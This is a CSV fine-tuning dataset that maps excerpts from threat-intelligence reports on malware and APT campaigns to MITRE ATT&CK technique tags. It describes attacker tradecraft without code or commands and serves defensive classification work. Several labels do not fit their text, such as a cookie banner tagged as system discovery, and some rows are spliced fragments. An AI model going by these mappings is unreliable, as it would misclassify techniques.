Files
LLM-Labs/Support Files/TTPs - Full Dataset Tagged.csv
T
2026-03-22 16:17:20 -06:00

4.6 MiB

1inputoutputtags
2The command processing function starts by substituting the main module name and path in the hosting process PEB, with the one of the default internet browser. The path of the main browser of the workstation is obtained by reading the registry value['T1057 - Process Discovery']fine_tune
3Along the way, HermeticWiper’s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\CurrentControlSet\Control\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver’s execution starts['T1569.002 - System Services: Service Execution']fine_tune
4These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document['T1584.004 - Server']fine_tune
5Additionally, the IP 211[.]72 [.]242[.]120 is one of the hosts for the domain microsoftmse[.]com, which has been used by several KIVARS variants['T1056.001 - Input Capture: Keylogging', 'T1113 - Screen Capture']fine_tune
6When communicating with its C2 server, Psylo will use HTTPS with a unique user-agent of (notice the lack of a space between "5.0" and "(Windows['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
7In older versions, Valak downloads the second stage JS and uses only one obfuscation technique: Base64. The newer versions use XOR in addition to Base64['T1027 - Obfuscated Files or Information']fine_tune
8We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS['T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
9dlpumgr32.exe, a legitimate signed file that belongs to the DESlock+ product - DLPPREM32.DLL, a malicious DLL sideloaded by dlpumgr32.exe that loads and decodes DLPPREM32.bin - DLPPREM32.bin, a shellcode that decompresses and loads a launcher in memory - data.res, an encrypted file decoded by the launcher and contains two SysUpdate versions: one for a 32-bit architecture and another for a 64-bit architecture - config.res, an encrypted file decoded by the launcher and contains the SysUpdate configuration, such as the command-and-control (C&C) address['T1027 - Obfuscated Files or Information', 'T1082 - System Information Discovery']fine_tune
10The malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida['T1027.002 - Obfuscated Files or Information: Software Packing']fine_tune
11The size of the image is more than 600KB and embedded in it is the encrypted IcedID main module. The encryption algorithm is RC4 and the keys are also embedded in the image at specific offset['T1027.003 - Steganography']fine_tune
12It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account['T1583.006 - Web Services']fine_tune
13These variants include system information collection (operating system, computer name), keylogger output, and browser password collection from Internet Explorer, Chrome and Firefox['T1082 - System Information Discovery']fine_tune
14While Kimsuky is very active, the KONNI RAT has also been upgraded to a more evasive piece of malware['T1027.002 - Obfuscated Files or Information: Software Packing']fine_tune
15But first: How did they get the tools on the victim’s systems. The adversary copied those tools over SMB from compromised system to compromised system wherever they needed these tools['T1570 - Lateral Tool Transfer']fine_tune
16This will also force the victim to re-open the browser using the newly written .lnk file, which is now loaded with Grandoreiro’s malicious extension. This extension will load on every browser startup using this specific .lnk file['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
17Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. Anatomy of the Attack For a number of years targeted attacks have nearly always followed the same modus operandi. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites['T1005 - Data from Local System']fine_tune
18dbghelp.dll is incompatible with DEP (Data Exception Prevention), as shown in Figure 14. Thus, when it loads the operating system will disable DEP for the injected wmplayer.exe process. This means that code can be executed from memory regions that are not marked as executable in the context of this process['T1562.001 - Impair Defenses: Disable or Modify Tools']fine_tune
19For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the "%HOMEDRIVE%\Windows" directory. It also only wipes files that have specific file extensions['T1083 - File and Directory Discovery']fine_tune
20It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory['T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1027 - Obfuscated Files or Information']fine_tune
21Registry traversal for Putty data exfiltration (left), code showing hostname, username and Private Key Files (right['T1552.002 - Unsecured Credentials: Credentials in Registry']fine_tune
22While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload’s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name['T1106 - Native API']fine_tune
23After Tor is up and running, Siloscape uses it to connect to its C2 – an IRC server, using an onion address that was provided as a command line argument['T1071 - Application Layer Protocol']fine_tune
24One interesting thing to note is that the Keybase account used by the attacker to chat with their victims has the same logo of the Pay2Key EOSIO smart contract system['T1585 - Establish Accounts']fine_tune
25It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions['T1485 - Data Destruction']fine_tune
26The LNK file contains a list of commands that will be executed upon running, and a blob that is a base64 encoded compressed payload['T1027 - Obfuscated Files or Information']fine_tune
27Fourth, this Darkhotel event is not based on the network protocol C2, but based on a custom file transfer control instruction['T1135 - Network Share Discovery']fine_tune
28When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation['T1047 - Windows Management Instrumentation', 'T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1559.001 - Component Object Model', 'T1027 - Obfuscated Files or Information']fine_tune
29The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g. username>@<email domain>. While usernames for legitimate logins at the victim’s network were generally formatted like <domain>\<username>. And attempted logins came from a relative small set of IP-addresses['T1016 - System Network Configuration Discovery', 'T1133 - External Remote Services']fine_tune
30CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets. If the victims use iTunes to backup files from iPhone to Mac (can be via Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers (Figure 5['T1083 - File and Directory Discovery']fine_tune
31The JavaScript component is the first stage of the attack and can deploy other malware such as a C# spy component, Golden Chickens components or several Python-based tools. The name Evilnum was given to the C# component by other researchers in the past, but the JS component also has been referred to as Evilnum. We have named the group Evilnum as that is the name of their flagship malware, and we’ll refer to the various malware pieces as components['T1105 - Ingress Tool Transfer']fine_tune
32But Ryuk isn’t new to us… we’ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)—especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including “WIZARD SPIDER,” “UNC1878,” and “Team9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others['T1047 - Windows Management Instrumentation', 'T1018 - Remote System Discovery']fine_tune
33The plugin is executed by using the Info command in the Lizar client application. A data structure containing the OS version, user name and computer name is sent to the server['T1082 - System Information Discovery']fine_tune
34Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM’s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised – and Microsoft has provided that indicator context where it is available to us['T1584.001 - Domains']fine_tune
35The malware proceeds to blacklist certain processes such as “wininit.exe” when approaches memory scraping in order to speed necessary card scan logic['T1057 - Process Discovery']fine_tune
36We were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat intelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples themselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others['T1083 - File and Directory Discovery']fine_tune
37From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. Strangely, in one case, the threat actors also appear to have used a domain name similar to the Foreign Policy Research Institute (FPRI) in a message purporting to be from CFR. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. Its called the "packager trick" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\Users\%username%\AppData\Local\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious "scriptlet" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial "qrat.exe" dropper from the current user's %tmp% directory. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN. Conclusion . The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. Volexity is actively tracking this group and the infrastructure currently in use for the benefit of its network security monitoring and threat intelligence customers['T1189 - Drive-by Compromise']fine_tune
38Apply the Microsoft security updates for MS17-010, including the updates for the Windows XP and Windows Server 2003 legacy operating systems. Disable SMBv1 on systems where it is not necessary (e.g. hosts that do not need to communicate with Windows XP and Windows 2000 systems). Carefully evaluate the need for allowing SMBv1-capable systems on interconnected networks compared to the associated risks. Scan networks for the presence of the DoublePulsar backdoor using plugins for tools such as Nmap. Use network auditing tools to scan networks for hosts that are vulnerable to the vulnerabilities described in MS17-010. Implement a backup strategy that includes storing data using offline backup media. Backups to locally connected, network-attached, or cloud-based storage are often insufficient because ransomware frequently accesses and encrypts files stored on these systems['T1490 - Inhibit System Recovery']fine_tune
39SUPERNOVA is implemented as a modification to the existing ‘app_web_logoimagehandler.ashx.b6031896.dll’ module of the SolarWinds Orion application. The purpose of this module, in it’s legitimate form, is to return the logo image configured by the user to various web pages of the SolarWinds Orion web application. In legitimate operation, this class only contains the ProcessRequest() and LogoImageHandler() methods, a private static Log object, and public boolean parameter IsReusable['T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
40AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. One of the new modules that has been added to this malware is the capability to steal WiFi profiles['T1555 - Credentials from Password Stores']fine_tune
41TA551 has distributed different families of malware, including Ursnif (Gozi/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed['T1204.002 - User Execution: Malicious File']fine_tune
42The plugins are variously designed to load other tools like Mimikatz or Carbanak, retrieve information from the victim machine, take screenshots, harvest credentials, retrieve browser histories, and more['T1217 - Browser Bookmark Discovery']fine_tune
43During our analysis, we successfully extracted the command line argument to execute its payload. The following command is used to execute the payload['T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
44When receiving HTTP commands, the WellMess server is setup to receive POST requests that contain RC6 encrypted cookies. The server decrypts the cookies using a hardcoded RC6 key and expects the decrypted data to contain no more than four tags['T1140 - Deobfuscate/Decode Files or Information', 'T1573.001 - Symmetric Cryptography']fine_tune
45Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors — both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright['T1059.007 - Command and Scripting Interpreter: JavaScript']fine_tune
46After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. TEARDROP and BEACON Malware Used . Multiple SUNBURST samples have been recovered, delivering different payloads. Next it checks that HKU\SOFTWARE\Microsoft\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. The credentials used for lateral movement were always different from those used for remote access. Detection Opportunity . Organizations can use HX’s LogonTracker module to graph all logon activity and analyze systems displaying a one-to-many relationship between source systems and accounts. After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer and execute files, profile the system, and disable system services. The userID is encoded via a custom XOR scheme after the MD5 is calculated. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: "\{[0-9a-f-]{36}\}"||"[0-9a-f]{32}"||"[0-9a-f]{16}". Command data is spread across multiple strings that are disguised as GUID and HEX strings. The extracted message is single-byte XOR decoded using the first byte of the message, and this is then DEFLATE decompressed['T1027 - Obfuscated Files or Information']fine_tune
47IcedID uses TLS in all of its communication but the certificate is self-signed. They can be spotted, as they use this kind of a self-signed certificate. The keyword “Internet Widgits Pty Ltd” is also being used by Trickbot, another banking malware, and it is believed that Trickbot and IcedID are cousins['T1573.002 - Asymmetric Cryptography', 'T1185 - Browser Session Hijacking']fine_tune
48In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a “Telegram Downloads” folder on an unnamed victim['T1566.002 - Phishing: Spearphishing Link']fine_tune
49PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry['T1552.002 - Unsecured Credentials: Credentials in Registry']fine_tune
50MegaCortex v1 was executed manually by threat actors using a separate batch file to kill security processes and stop/disable services related to security, backup and shadow copies. That same batch file was subsequently used to execute the MegaCortex binary with a Base64 key as a command-line argument['T1489 - Service Stop', 'T1562.001 - Impair Defenses: Disable or Modify Tools']fine_tune
51Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies['T1005 - Data from Local System']fine_tune
52First observed by Microsoft on Jan. 13, 2022, WhisperGate malware is computer network attack (CNA) malware aimed at deleting Microsoft Windows Defender and corrupting files on the target. It consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload. At the time of writing, there are two known samples identified as WhisperGate: Stage1.exe and Stage2.exe. Stage1.exe purports to be ransomware, as it overwrites the target’s master boot record with 512 bytes and upon reboot displays the following ransom note['T1561.002 - Disk Structure Wipe']fine_tune
53The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings['T1105 - Ingress Tool Transfer']fine_tune
54These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information['T1082 - System Information Discovery']fine_tune
55Of the tools listed above, many were obfuscated with VMProtect (v1.60-2.05), a recurring theme with BackdoorDiplomacy tools['T1027 - Obfuscated Files or Information']fine_tune
56An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise — usually as a download from a spam email — they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER’s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network['T1071.001 - Application Layer Protocol: Web Protocols', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1204.002 - User Execution: Malicious File', 'T1041 - Exfiltration Over C2 Channel']fine_tune
57Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. The C&C scans for specific destinations’ known vulnerabilities in Hadoop, Redis and ActiveMQ (CVE-2016-3088) for self-propagation. Hadoop’s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message['T1203 - Exploitation for Client Execution']fine_tune
58As can be seen in the figure above, the packer used for CVE-2019-0803 is very similar to the one used in CVE-2017-0005. The file was compiled on September 18, 2018, and is also internally named “Add.dll”. Like the previously packed exploit, CVE-2019-0803 also has an export function named “AddByGod” and contains debug information['T1027.002 - Obfuscated Files or Information: Software Packing']fine_tune
59Although, the use of target names with actuating themes is not new to this group, there has been a significant uptick in the number of emails received and this campaign has been persistently active for the past few weeks['T1566.002 - Phishing: Spearphishing Link']fine_tune
60This function is the supporting functionality for WinVNC. To allow the VNC session to connect, the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001['T1021.005 - Remote Services:VNC']fine_tune
61We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents. Tools linked to Gamaredon and discussed in this blogpost are detected as variants of MSIL/Pterodo, Win32/Pterodo or Win64/Pterodo by ESET’s products. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. It also saves to disk the malicious OTM file (Outlook VBA project) that contains a macro, the malicious email attachment and, in some cases, a list of recipients that the emails should be sent to. Office macro injection module – CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. Module updates . Interestingly, some of the custom tools described in Palo Alto Networks’ 2017 blogpost on Gamaredon are still being updated and in use today. C# compiler module . This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. As with many other tools used by the Gamaredon group, they come in four different coding languages: C/C++, C#, batch file and VBScript. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
62b.wnry — Bitmap image used as desktop wallpaper (shown in Figure 2) - c.wnry — Configuration containing Tor command and control (C2) addresses, Bitcoin addresses, and other data - r.wnry — Ransom demand text - s.wnry — ZIP archive containing Tor software to be installed on the victim’s system; saved in TaskData directory - t.wnry — Encrypted DLL containing file-encryption functionality - u.wnry — Main module of the WCry ransomware “decryptor” - taskdl.exe — WNCRYT temporary file cleanup program - taskse.exe — Program that displays decryptor window to RDP sessions - msg — Directory containing Rich Text Format (RTF) ransom demands in multiple languages['T1090.003 - Proxy: Multi-hop Proxy']fine_tune
63CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment['T1090 - Proxy', 'T1021.004 - Remote Services: SSH', 'T1572 - Protocol Tunneling']fine_tune
64In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor['T1204.002 - User Execution: Malicious File']fine_tune
65After the ransomware is executed, Clop appends the .clop extension to the victim's files. We have observed different variants using different extensions, such as “.CIIp”, “.Cllp” and “.C_L_O_P”. Different versions of the ransom note have also been observed after encryption. Depending on the variant, any of these ransom text files could drop: “ClopReadMe.txt”, “README_README.txt”, “Cl0pReadMe.txt“ and “READ_ME_!!!.TXT['T1486 - Data Encrypted for Impact']fine_tune
66H1N1 has self-propagation/lateral movement functionality (which requires user interaction) via mapped/available network shares or mounted USB devices['T1080 - Taint Shared Content']fine_tune
67Another component of the KGH suite is the m.dll module, which is an information stealer that harvests data from browsers, Windows Credential Manager, WINSCP and mail clients['T1114.001 - Email Collection: Local Email Collection']fine_tune
68Before the driver is loaded, the malware disables crash dump by setting the following registry key['T1070 - Indicator Removal on Host', 'T1562.006 - Impair Defenses: Indicator Blocking', 'T1112 - Modify Registry']fine_tune
69Conclusion Tick has left a trail of evidence indicating that its activity began as early as 2006. In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector['T1204.002 - User Execution: Malicious File']fine_tune
70Gathering system information and sending it to the control server. The system information gathered from the endpoint includes: MAC address of the endpoint Computer Name Product name from HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName This information is concatenated into a single string in the format: “MAC_Address||ComputerName||ProductName” and is sent to the control server - MAC address of the endpoint - Computer Name - Product name from HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName - This information is concatenated into a single string in the format: “MAC_Address||ComputerName||ProductName” and is sent to the control server - Recording HTTP requests from the control server to the temporary file prx in the implant’s install directory with the current system timestamp['T1012 - Query Registry']fine_tune
71Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount['T1078.002 - Domain Accounts', 'T1550.001 - Application Access Token']fine_tune
72In the analyzed sample the RAT component was named “BotDLL[.]dll”. It has some typical RAT functionality such as command shell, video recording of the screen, remote desktop, port forwarding, and file system access['T1125 - Video Capture', 'T1090 - Proxy', 'T1005 - Data from Local System']fine_tune
73This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. It is capable of downloading and executing files, capturing screenshots and executing arbitrary commands on compromised systems['T1113 - Screen Capture']fine_tune
74Introduced in macOS 10.11, this utility has only one publicly documented use, which is to return the status of the System Integrity Protection tool. The csrutil tool is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not['T1082 - System Information Discovery']fine_tune
75Shortly after this RTF document is opened, the remaining stages of the Inception malware are found executing on the system. The loader DLL is responsible for decrypting and injecting the core payload DLL into memory, from an encrypted file present on disk. The core payload DLL's main function is to gather system information, execute other malware in the form of plugins, and update itself['T1204.002 - User Execution: Malicious File']fine_tune
76The NOKKI malware itself has been updated in the short period of time it has been observed, moving from FTP to HTTP for C2 operations. The malware is modular in nature, and based on analysis of the information gathering module, it is highly likely the NOKKI operators are the same as the KONNI operators['T1071.001 - Application Layer Protocol: Web Protocols', 'T1071.002 - File Transfer Protocols']fine_tune
77The network mode being set to the host along with the container trying to be deployed as a privileged container. The Docker Hub account of MegawebMaster has numerous public images, five of which have TeamTNT utilities with a significant amount of downloads. These five images include dockgeddon, docker, tornadopw, and dcounter (T1204.003['T1496 - Resource Hijacking']fine_tune
78TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims’ servers['T1610 - Deploy a container', 'T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
79Even simple API calls were obfuscated, and instead of just calling the functions, Siloscape made the effort to use the Native API (NTAPI) version of the same function['T1106 - Native API', 'T1027 - Obfuscated Files or Information']fine_tune
80The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed, PLAINTEE executes the following command in a new process to add persistence['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
81In this version, the communication protocol with the C&C server was also upgraded to use AES encryption['T1573.001 - Symmetric Cryptography']fine_tune
82The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com['T1568.002 - Domain Generation Algorithms']fine_tune
83HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
84The attackers then attempt to gain root access to the server by setting up a local privileged user named ‘hilde’ on the host server and use it in order to connect back via SSH['T1021.004 - Remote Services: SSH']fine_tune
85The Russia-linked Shuckworm group (aka Gamaredon, Armageddon) is continuing to conduct cyber-espionage attacks against targets in Ukraine. Over the course of recent months, Symantec’s Threat Hunter Team, a part of Broadcom Software, has found evidence of attempted attacks against a number of organizations in the country['T1057 - Process Discovery', 'T1204.002 - User Execution: Malicious File']fine_tune
86After the malware has invoked a method named _s_is_high_time and waited on several timers to expire, it begins encrypting the (unfortunate) user’s files, by invoking a function named carve_target. It then generates a list of files to encrypt, by invoking the get_targets function, passing in the is_file_target as a filter function. This filter function filters out all files, except those that match certain file extensions. The encrypted list of extensions is hard-coded at address 000000010001299E within the malware. In part one of this blog post series, we decrypted all the embedded strings, and thus can readily examine the decrypted list['T1486 - Data Encrypted for Impact']fine_tune
87Timeline . OSX/FruitFly: 1) 2) Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.client.client.plist 3) Remove the malware's persistent perl script & file. Ok, so the attackers are using an open-source multi-stage post-exploitation agent. Unfortunately this file is now inaccessible. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. Finally, the malware modifies the infected host's network settings in order to set up a proxy whose address is (dynamically) specified via a remote proxy auto-configuration (PAC) file. As it's a binary plist file, dump its contents with the plutil utility (using the -p commandline flag): . As the KeepAlive key has been set to 1 (true), the Launch Daemon will be automatically started every time the infected system is rebooted. MacRansom is the first 'Ransomware-as-a-Service' for macOS, that aims to encrypt (ransom) all the user's files. Then these files will be passed (to a new instance) of the malware, in order to be encrypted. Thus it appears that once encrypted, the files are pretty much gone for good (save perhaps for a brute force decryption attack). Good news, RansomWhere. Using the neat 'Suspicious Package' application, we can statically examine this script: In short, it persists CPUMeaner as a launch agent via the /Library/LaunchAgents/com.osxext.cpucooler.plist file['T1140 - Deobfuscate/Decode Files or Information']fine_tune
88Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon['T1012 - Query Registry']fine_tune
89This attack begins with a spear phishing attack through a targeted email campaign. Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
90The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object “xl\embeddings\oleObject1[.]bin” inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the “ReadAndWriteExtractedBinFile” function - The DLL is loaded with LoadLibraryA - The DLL’s exported function, such as “Get2”, is run by the macro['T1055.001 - Process Injection: Dynamic-link Library Injection']fine_tune
91Please note that the Ecipekac Layer III loader module is embedded in the encrypted Layer II loader['T1027 - Obfuscated Files or Information']fine_tune
92This feature generates a stageless Beacon payload artifact, hosts it on Cobalt Strike’s web server, and presents a one-liner to download and run the artifact['T1197 - BITS Jobs']fine_tune
93The NetWire payloads in all observed campaigns included nearly identical configurations. Specifically, the C2 domain clients[.]enigmasolutions[.]xyz and the password were the same['T1105 - Ingress Tool Transfer']fine_tune
